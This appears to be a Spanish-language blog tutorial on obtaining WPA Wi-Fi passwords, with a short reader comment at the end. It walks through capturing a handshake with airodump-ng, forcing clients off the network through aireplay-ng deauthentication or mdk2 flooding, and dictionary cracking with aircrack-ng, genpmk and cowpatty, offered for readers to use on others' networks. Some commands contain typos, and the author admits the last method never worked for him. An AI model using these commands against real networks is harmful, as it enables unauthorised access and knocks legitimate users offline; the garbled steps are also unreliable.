Obtener clave WPA

Vamos a ver si podemos explicar de forma rápida pero simple, la obtención de claves WPA.Tenemos que matizar 2 cosas:
- En primer lugar como siempre advertimos, este tutorial es para demostrar la inseguridad de las redes, LO KE CADA UNO HAGA CON EL ES COSA SUYA
- En segundo lugar la señal deberá llegarnos con intensidad REGULAR en adelante.

En primer lugar vamos a ver que necesitamos:

- Un ordenador con Wifislax (o cualquier distribucion de Linux, siemre que tengas aircrack-ng, cowpatty y fondecrypter).
- Fondecrypter ( http://www.megaupload.com/?d=8XM4I0S3)
- Diccionario (archivo de texto, con una relación de palabras en castellano, buscad cuesta la vida encontrarlo) y sino siempre puedes hacerlo tu con paciencia.
- Pen drive para almacenar Fondecrypter y nuestro diccionario de palabaras.


Damos por sentado que sabemos montar Wifislax y demas (quién no sepa, encontrará post en este mismo blog).

Bien pues manos a la obra...todo el mundo a cargar WIFISLAX o su distribucion de Linux (yo lo voy a explicar todo con WifiSlax)...ok, todo cargado no????
En este tema no vamos a picar un poco codigo para ir familiarizandonos con la Shell de Linux.

Antes de nada ya saben todo el mundo a cargar sus drivers: Wifislax->Asistencia chipset-> y pillamos nuestros drivers.

Pues nada chicos a picar código, abrimos la shell de linux, la podemos cargar desde el escritorio que tenemos un acceso rápido y escribiremos:
(todo va sin almohadillas)

#iwconfig

(así sabremos cual es nuestra interfaz: wifi0, rausb0, etc)

#airodump-ng wifi0

(lanzamos airudump el cual detectará todas las redes que tenemos a nuestro alcance y, en este caso wifi0 porque es mi interfaz, ya sabeis cada uno con su interfaz).
(debemos tener en cuenta que haya alguien conectado a la red a atacar, una vez que lo tengamos claro abriremos una nueva Shell, para el siguiente conmando).

#airodump-ng -c 9 --bssid MAC -w archivocaptura wifi0

-c 9: canal 9, nosotros en vez de 9 pondremos el canal donde este la red
--bssid: MAC de nuestra red
-w archivocaptura: especificamos el nombre donde guardaremos la captura.

(este comando por decirlo de forma rápida lo que hace es seleccionar la red en cuestión).Abrimos una nueva consola.

Bien hasta ahora espero que bien, recordar que si estais en la versión live tendreis que dejarle pensar un poco. Lo que nosotros estamos buscando es obtener el HANDSHAKE
En este punto del ataque tenemos 2 opciones para atacar:
-------------------------------------------------------------------------------------
# aireplay-ng -0 1 -a MAC -c CLIENTE wifi0

CLIENTE: cliente que está asociado a la red

(en este proceso lo que haremos es desautentificar al cliente de la red y cuando se vuelva a conectar lo cazamos, quizas haya que repetirlo varias veces).
-------------------------------------------------------------------------------------

# mdk2 wifi0 m -t 00:11:22:33:44:55

(en este caso lo que hacemos es generar 70 clientes ficticios al router, por lo que por esa saturación el cliente que estaba conectado se caerá y cuando vuelva a conectarse ZAS!!!!! pescamos el handshake).Podremos verlo en la primera Shell donde estaban todas las redes, justo debajo aparecerán los clientes ficticios.
-------------------------------------------------------------------------------------
Bien como saber si hemos obtenido el handshake.
En la segunda shell que hemos abierto, donde sellecionabamos la red en cuestión arriba a la derecha debería aparecer handshake 00:xx:xx.......
pues continuamos cuando lo tengamos aunque aki hay dos variantes
-------------------------------------------------------------------------------------
Una vez en este paso pincharemos nuestro Pen-Drive con el archivo de diccionario que habíamos conseguido anteriormente. Al hacer esto en el escritorio, nos saldrá la unidad de disco, pondremos el ratón encima y veremos que extensión es: hba1, hdc1, etc).
-------------------------------------------------------------------------------------
Ya estamos casi acabando...

# aircarck-ng -w /mnt/.... -b MAC archivocaptura-01.cap

-w /mnt...: especificamos la ruta de donde esta el diccionario

(saltará la ventana del aircrack y verás como empieza a comparar con las palabaras de tu diccionario).

SI TIENES SUERTE Y LA SACAS PUES MI MAS SINCERA ENHORABUENAAAAAAA, sino podemos intentar hacer algo más, me refiero a que si nuestro diccionario no funciona podremos intentar generar uno a partir del Handshake.
NO IMPORTANTE:
YO NUNCA LO HE CONSEGUIDO, PERO POR LA RED HE VISTO VIDEOS EN LOS QUE FUNCIONA!!!!!!!
-------------------------------------------------------------------------------------
Ahora copiaremos el archivo Fondecrypter en la carpeta home (en el escritorio encontrarás un acceso al sitio) REUCERDA KE DESDE TENER ABIERTO EL SITIO ORIGEN Y EL DESTINO PARA PEGARLOS

#chmod 777 fondecrypter
#./fondecrypter

(al hacer esto se crea un archivo de texto keysfon.txt en la carpeta home)

#genpmk –f keysfon.txt –d archivocaptura-01.cap –s nombredelared
-f: Diccionario.
-d: Nombre del fichero de hash que se generará.
-s: El Essid.

(yo en este paso, estuvo durante 7 horas y no encontró nada, pero si en vuestro caso lo encuentra solo os quedará hacer)

#cowpatty -r archivocaptura-01.cap –d keysfond.txt –s nombredelared
-r: Fichero *.cap donde capturamos el handshake con el airodump.
-d: Nombre del fichero generado con la utilidad genpmk.
-s: El Essid.

(y supuestamente debería darte la clave, pero ya te digo yo nunca lo he conseguido pero se que se puede).

En fin espero que os sirva todo y que os sirva todo, y si teneis alguna duda ya sabeis, en google esta la solución, aunque siempre podreis dejar un post akí y se intentará´ayudarte en lo que se pueda).

Saludoxxxxxxxx______Shak

1 comentarios:

barek dijo...

qiero saber como sacar clave wpa wpa2 moy facil

Twitter Facebook Favorites More